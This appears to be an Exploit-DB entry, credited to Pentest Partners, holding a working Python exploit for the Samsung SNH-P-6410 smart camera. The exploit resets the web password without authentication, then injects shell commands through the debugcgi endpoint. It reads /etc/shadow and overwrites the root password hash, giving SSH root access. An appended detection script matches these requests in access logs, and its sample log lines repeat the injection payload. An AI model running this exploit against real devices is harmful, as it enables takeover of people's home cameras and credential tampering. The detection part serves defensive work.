Samsung Smart Home Camera SNH-P-6410 - Command Injection
Source: https://www.pentestpartners.com Author: PentestPartners Published: 2016-08-15
# E-DB Note: source ~ https://www.pentestpartners.com/blog/samsungs-smart-camera-a-tale-of-iot-network-security/
 
import urllib, urllib2, crypt, time
 
# New password for web interface
web_password    = 'admin'
# New password for root
root_password   = 'root'
# IP of the camera
ip          = '192.168.12.61'
 
# These are all for the Smartthings bundled camera
realm = 'iPolis'
web_username = 'admin'
base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;'
 
 
# Take a command and use command injection to run it on the device
def run_command(command):
    # Convert a normal command into one using bash brace expansion
    # Can't send spaces to debugcgi as it doesn't unescape
    command_brace = '{' + ','.join(command.split(' ')) + '}'
    command_url = base_url + command_brace
 
    # HTTP digest auth for urllib2
    authhandler = urllib2.HTTPDigestAuthHandler()
    authhandler.add_password(realm, command_url, web_username, web_password)
    opener = urllib2.build_opener(authhandler)
    urllib2.install_opener(opener)
 
    return urllib2.urlopen(command_url)
 
# Step 1 - change the web password using the unauthed vuln found by zenofex
data = urllib.urlencode({ 'data' : 'NEW;' + web_password })
urllib2.urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)
 
# Need to sleep or the password isn't changed
time.sleep(1)
 
# Step 2 - find the current root password hash
shadow = run_command('cat /etc/shadow')
 
for line in shadow:
    if line.startswith('root:'):
        current_hash = line.split(':')[1]
 
# Crypt the new password
new_hash = crypt.crypt(root_password, '00')
 
# Step 3 - Use sed to search and replace the old for new hash in the passwd
# This is done because the command injection doesn't allow a lot of different URL encoded chars
run_command('sed -i -e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')
 
# Step 4 - check that the password has changed
shadow = run_command('cat /etc/shadow')
 
for line in shadow:
    if line.startswith('root:'):
        current_hash = line.split(':')[1]
 
if current_hash <> new_hash:
    print 'Error! - password not changed'
 
# Step 5 - ssh to port 1022 with new root password!
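
A detection-side example, added here and not part of the original script or the Pentest Partners post: it flags the two requests the script sends (the POST to class_admin_privatekey.php and debugcgi shell calls carrying ';' or brace expansion) in HTTP access logs, and marks a client that does both. It assumes combined-format logs from a proxy or sensor in front of the camera; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = '''\
192.168.12.50 - - [15/Aug/2016:10:00:01 +0000] "POST /classes/class_admin_privatekey.php HTTP/1.1" 200 12
192.168.12.50 - admin [15/Aug/2016:10:00:03 +0000] "GET /cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;{cat,/etc/shadow} HTTP/1.1" 200 512
192.168.12.20 - admin [15/Aug/2016:10:05:00 +0000] "GET /cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/tmp HTTP/1.1" 200 80
192.168.12.20 - admin [15/Aug/2016:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 900
'''

REQ = re.compile(r'^(\S+) .*?"(\w+) (\S+) HTTP/[\d.]+"')
# What the script relies on: ';' to chain a command, '{a,b}' to avoid spaces.
# '|', backtick and '$(' are added as common shell metacharacters (assumption).
META = re.compile(r'[;|`]|\$\(|\{[^}]*,[^}]*\}')

def classify(line):
    """Return (client_ip, tag) for a suspicious request, or None."""
    m = REQ.match(line)
    if not m:
        return None
    ip, method, target = m.groups()
    path, _, query = target.partition('?')
    # Split on '&' only, so a ';' inside a value is kept for inspection.
    params = {k: unquote(v) for k, _, v in (p.partition('=') for p in query.split('&'))}
    if path == '/classes/class_admin_privatekey.php' and method == 'POST':
        return ip, 'password-reset'
    if path == '/cgi-bin/adv/debugcgi' and params.get('msubmenu') == 'shell':
        injected = any(META.search(params.get(k, '')) for k in ('command', 'command_arg'))
        return ip, 'command-injection' if injected else 'debug-shell'
    return None

def scan(log_text):
    """Return findings in log order; escalate reset followed by injection."""
    findings, reset_seen = [], set()
    for line in log_text.splitlines():
        hit = classify(line)
        if not hit:
            continue
        ip, tag = hit
        if tag == 'password-reset':
            reset_seen.add(ip)
        elif tag == 'command-injection' and ip in reset_seen:
            tag = 'reset-then-injection'
        findings.append((ip, tag))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```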
 